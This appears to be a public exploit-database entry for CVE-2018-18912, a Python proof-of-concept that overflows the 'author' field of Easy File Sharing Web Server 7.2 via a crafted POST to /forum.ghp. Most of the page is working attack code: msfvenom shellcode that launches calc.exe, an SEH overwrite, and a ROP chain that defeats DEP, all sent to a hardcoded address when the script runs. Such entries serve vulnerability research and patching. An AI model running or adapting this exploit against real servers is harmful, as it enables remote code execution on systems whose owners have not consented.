Easy File Sharing Web Server 7.2 - author Remote Buffer Overflow (SEH) Exploit

🗓️ 05 Nov 2018 00:00:00 — Reported by kristijan. Type: zdt

Easy File Sharing Web Server 7.2 Remote Buffer Overflow (SEH)

CVE
CVE-2018-18912
13 May 2019 19:05
cve
Cvelist
CVE-2018-18912
13 May 2019 19:05
cvelist
EUVD
EUVD-2018-10622
7 Oct 2025 00:30
euvd
NVD
CVE-2018-18912
13 May 2019 20:29
nvd
OSV
CVE-2018-18912
13 May 2019 20:29
osv
Prion
Stack overflow
13 May 2019 20:29
prion
RedhatCVE
CVE-2018-18912
22 May 2025 03:35
redhatcve
# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912


# 1. Proof of Concept

import socket
import struct

# Target address and port read by send_malformed_buffer(); the same address is
# repeated verbatim in the Host header of the request built further down.
HOST = '192.168.184.1'
PORT = 80

def p32(v):
	"""Pack the integer *v* as a 4-byte little-endian unsigned value.

	Thin wrapper over struct's "<L" format; raises struct.error when *v*
	does not fit in 32 bits or is negative.
	"""
	packer = struct.Struct("<L")
	return packer.pack(v)

def send_malformed_buffer(data):
	"""Open one TCP connection to HOST:PORT, write *data*, and close it.

	*data* is handed to a single send() call, whose return value (the number
	of bytes actually written) is not checked. No response is read, and the
	socket is only closed on the success path.
	"""
	conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	conn.connect((HOST, PORT))
	conn.send(data)
	conn.close()


# NOTE(review): this script is written for Python 2: str literals are joined
# with the bytes that struct.pack returns (the 'handler' line below and the
# ropchain), which raises TypeError under Python 3. From the defender's side
# the observable is a POST to /forum.ghp whose 'author' form field is roughly
# 3 KB long (the vulnerability is CVE-2018-18912 per the header above).
#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python

# Payload bytes as emitted by the msfvenom command above (the -b list is the
# set of byte values the author excludes for this input).
shellcode =  ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"


# ---====GADGETS====---
# Gadget addresses. The 0x1001.../0x1002... range is attributed to
# ImageLoad.dll by the inline comment further down; the 0x61c... addresses are
# not attributed anywhere on this page. pop_esi_retn and pop_ebx_retn are
# declared here but never used in the chain.
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09 
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2


ropchain = ''

# Crash buffer: 64-byte pad, 4-byte nSEH placeholder, the SEH handler slot
# overwritten with the stack-pivot gadget, then 2348 filler bytes; the ROP
# chain is appended after this filler further down.
buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348

# EAX = *(0x61c832d0) via the MOV EAX,[EAX] gadget named in the inline comment;
# the purpose of the three gadgets that follow is not documented on this page.
ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)

#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)

#EDX = NewProtect(0x40)
# The xor zeroes EDX; the 64 inc_edx gadgets that follow leave it at 0x40,
# the NewProtect value named in the comment above.
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)

#ECX = lpOldProtect (ptr to writable address address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)

#EBX = dwSize()
# neg(0xFFFFFFFE) = 2 (mod 2^32) is added to EBX. EBX is never set anywhere in
# this chain (pop_ebx_retn is unused), so the resulting dwSize depends on the
# register's value at pivot time — NOTE(review): confirm.
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)

#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)

#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)

#PUSHAD
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode

buff += ropchain

# HTTP request carrying buff in the 'author' form field. No Content-Length
# header is sent; the request relies on "Connection: close". The Host header
# duplicates HOST instead of referencing it.
request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"

# Fires at module load: there is no __main__ guard and no error handling.
send_malformed_buffer(request)
